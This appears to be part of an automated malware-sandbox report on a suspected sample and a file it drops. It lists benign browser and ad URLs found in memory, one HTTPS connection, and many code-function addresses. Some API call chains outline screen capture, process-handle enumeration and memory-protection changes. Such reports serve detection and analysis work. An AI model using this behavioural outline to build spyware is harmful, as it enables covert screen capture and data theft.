Source: sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&ci=1696497267574.12791&key=1696497267400700002.1&cta
Source: sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/5b4DH7KHAf2n_mNaLjNi1-UAoKmM9rhqaA9w7FyznHo.10943.jpg
Source: sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: sUKFphHSzX.exe, 00000009.00000003.1686357918.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687418877.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1686453237.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684496708.0000020931A55000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685603634.0000020931A52000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687506898.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685529124.0000020931A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: sUKFphHSzX.exe, 00000009.00000003.1686357918.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687418877.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1686453237.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684496708.0000020931A55000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685603634.0000020931A52000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687506898.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685529124.0000020931A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: sUKFphHSzX.exe, 00000009.00000003.1686357918.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687418877.0000020931A50000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1686453237.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684496708.0000020931A55000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685603634.0000020931A52000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1687506898.0000020931A54000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1685529124.0000020931A50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000003.00000002.1533581435.0000000004E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqrfQHr4pbW4ZbWfpbY7ReNxR3UIG8zInwYIFIVs9eYi
Source: powershell.exe, 00000003.00000002.1536380808.0000000005D49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: sUKFphHSzX.exe, 00000009.00000003.1695832026.0000020931A83000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1694818898.0000020933700000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1692460580.0000020934ED2000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.00000209346D1000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.000002093385E000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934748000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934750000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.0000020933856000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.00000209346C9000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1694818898.0000020933708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.njy8xaI_aUJp
Source: sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15e498ec2b39921665a1fbc954bff40a8106629178eadc64
Source: sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: sUKFphHSzX.exe, 00000009.00000003.1684381048.000002093340F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: sUKFphHSzX.exe, 00000009.00000003.1696230866.0000020931A3F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.marriott.com/default.mi?utm_sou
Source: sUKFphHSzX.exe, 00000009.00000003.1751118200.00000209319E2000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000002.1753788629.00000209319E3000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1752860853.00000209319E3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_camp22781
Source: sUKFphHSzX.exe, 00000009.00000003.1695962209.0000020931A40000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.00000209338CD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.marriott.com/default.mi?utm_source=admarketplace&utm_medium=cpc&utm_campaign=Marriott_Pr
Source: sUKFphHSzX.exe, 00000009.00000003.1695832026.0000020931A83000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1694818898.0000020933700000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1692460580.0000020934ED2000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.00000209346D1000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.000002093385E000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934748000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934750000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.0000020933856000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.00000209346C9000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1694818898.0000020933708000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.d-GHL1OW1fkT
Source: sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.sYEKgG4Or0s6
Source: sUKFphHSzX.exe, 00000009.00000003.1693498114.00000209352A4000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.0000020933865000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1694818898.0000020933710000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.00000209346D9000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: sUKFphHSzX.exe, 00000009.00000003.1693498114.00000209352A4000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1695219313.0000020933865000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1694818898.0000020933710000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.00000209346D9000.00000004.00000020.00020000.00000000.sdmp, sUKFphHSzX.exe, 00000009.00000003.1689245673.0000020934758000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928

Source: unknown

HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.10:49928 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe

Code function: 9_2_000002093355FB30 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetDC,GetDeviceCaps,GetDeviceCaps,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SHCreateMemStream,SelectObject,DeleteDC,ReleaseDC,DeleteObject,EnterCriticalSection,LeaveCriticalSection,IStream_Size,IStream_Reset,IStream_Read,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

9_2_000002093355FB30

Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335643F0 RtlAcquirePebLock,NtAllocateVirtualMemory,lstrcpyW,lstrcatW,NtAllocateVirtualMemory,lstrcpyW,RtlInitUnicodeString,RtlInitUnicodeString,LdrEnumerateLoadedModules,RtlReleasePebLock,CoInitializeEx,lstrcpyW,lstrcatW,CoGetObject,lstrcpyW,lstrcatW,CoGetObject,CoUninitialize,	9_2_00000209335643F0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335B26E0 NtAllocateVirtualMemory,	9_2_00000209335B26E0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335B26D0 NtQuerySystemInformation,	9_2_00000209335B26D0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933563CF0 GetModuleHandleA,GetProcAddress,OpenProcess,NtQuerySystemInformation,NtQuerySystemInformation,GetCurrentProcess,NtQueryObject,GetFinalPathNameByHandleA,CloseHandle,CloseHandle,	9_2_0000020933563CF0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA315F0 NtQueryVirtualMemory,NtProtectVirtualMemory,	9_2_00007FF6CFA315F0

Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Code function: 0_2_06E5D324	0_2_06E5D324
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Code function: 0_2_09099880	0_2_09099880
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Code function: 0_2_0909A510	0_2_0909A510
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Code function: 0_2_0909D6C0	0_2_0909D6C0
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Code function: 0_2_090920B8	0_2_090920B8
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Code function: 0_2_09099880	0_2_09099880
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Code function: 0_2_0909A500	0_2_0909A500
Source: C:\Users\user\Desktop\HZ1BUCfTne.exe	Code function: 0_2_0909D6C0	0_2_0909D6C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_02EBB770	3_2_02EBB770
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_02EBB748	3_2_02EBB748
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_02EB34ED	3_2_02EB34ED
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_087B3AA8	3_2_087B3AA8
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093357749C	9_2_000002093357749C
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933541340	9_2_0000020933541340
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093355F200	9_2_000002093355F200
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335222D0	9_2_00000209335222D0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093358114C	9_2_000002093358114C
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093350F1C0	9_2_000002093350F1C0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933560820	9_2_0000020933560820
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093351B820	9_2_000002093351B820
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093351C8C0	9_2_000002093351C8C0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335998C0	9_2_00000209335998C0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093350F8B0	9_2_000002093350F8B0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093356662B	9_2_000002093356662B
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933561660	9_2_0000020933561660
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093356C55A	9_2_000002093356C55A
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093351ACC0	9_2_000002093351ACC0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093355FB30	9_2_000002093355FB30
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933568B70	9_2_0000020933568B70
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093359E968	9_2_000002093359E968
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933561FF0	9_2_0000020933561FF0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335670B0	9_2_00000209335670B0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933558F60	9_2_0000020933558F60
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093351CF60	9_2_000002093351CF60
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335643F0	9_2_00000209335643F0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093354C300	9_2_000002093354C300
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093352E320	9_2_000002093352E320
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335813C8	9_2_00000209335813C8
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335083D0	9_2_00000209335083D0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933558230	9_2_0000020933558230
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335501F0	9_2_00000209335501F0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093351A1F0	9_2_000002093351A1F0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335102E0	9_2_00000209335102E0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093359E2CC	9_2_000002093359E2CC
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093354D2A0	9_2_000002093354D2A0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093352E130	9_2_000002093352E130
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933516130	9_2_0000020933516130
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335551E0	9_2_00000209335551E0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209334E6180	9_2_00000209334E6180
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335747FC	9_2_00000209335747FC
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093357F7F4	9_2_000002093357F7F4
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093352C820	9_2_000002093352C820
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335528C0	9_2_00000209335528C0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335758D0	9_2_00000209335758D0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093357088C	9_2_000002093357088C
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933564740	9_2_0000020933564740
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933556760	9_2_0000020933556760
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933544710	9_2_0000020933544710
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093354C600	9_2_000002093354C600
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335745F8	9_2_00000209335745F8
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209334E6610	9_2_00000209334E6610
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335286D0	9_2_00000209335286D0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335366A0	9_2_00000209335366A0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335506A6	9_2_00000209335506A6
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093356B68A	9_2_000002093356B68A
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933560500	9_2_0000020933560500
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933505520	9_2_0000020933505520
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933506510	9_2_0000020933506510
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335355B0	9_2_00000209335355B0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933578C34	9_2_0000020933578C34
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093354CC50	9_2_000002093354CC50
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933572CD0	9_2_0000020933572CD0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933517B8D	9_2_0000020933517B8D
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933574A00	9_2_0000020933574A00
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335829F4	9_2_00000209335829F4
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933539A10	9_2_0000020933539A10
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093354C930	9_2_000002093354C930
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933548950	9_2_0000020933548950
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209335819B8	9_2_00000209335819B8
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093354F040	9_2_000002093354F040
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933575044	9_2_0000020933575044
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933577060	9_2_0000020933577060
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933519090	9_2_0000020933519090
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093354CF70	9_2_000002093354CF70
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093355AE50	9_2_000002093355AE50
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093350FEE0	9_2_000002093350FEE0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933589EA0	9_2_0000020933589EA0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209334E6D20	9_2_00000209334E6D20
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00000209334E5DB0	9_2_00000209334E5DB0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_000002093354FDB0	9_2_000002093354FDB0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_0000020933570D98	9_2_0000020933570D98
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA37FD0	9_2_00007FF6CFA37FD0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA36030	9_2_00007FF6CFA36030
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA49F70	9_2_00007FF6CFA49F70
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA45F60	9_2_00007FF6CFA45F60
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA4AF50	9_2_00007FF6CFA4AF50
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA43EC7	9_2_00007FF6CFA43EC7
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA4DD60	9_2_00007FF6CFA4DD60
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA36D40	9_2_00007FF6CFA36D40
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA3BAC0	9_2_00007FF6CFA3BAC0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA35AB0	9_2_00007FF6CFA35AB0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA639D0	9_2_00007FF6CFA639D0
Source: C:\Users\user\AppData\Local\Temp\ZrFdjymH1r\sUKFphHSzX.exe	Code function: 9_2_00007FF6CFA4D890	9_2_00007FF6CFA4D890
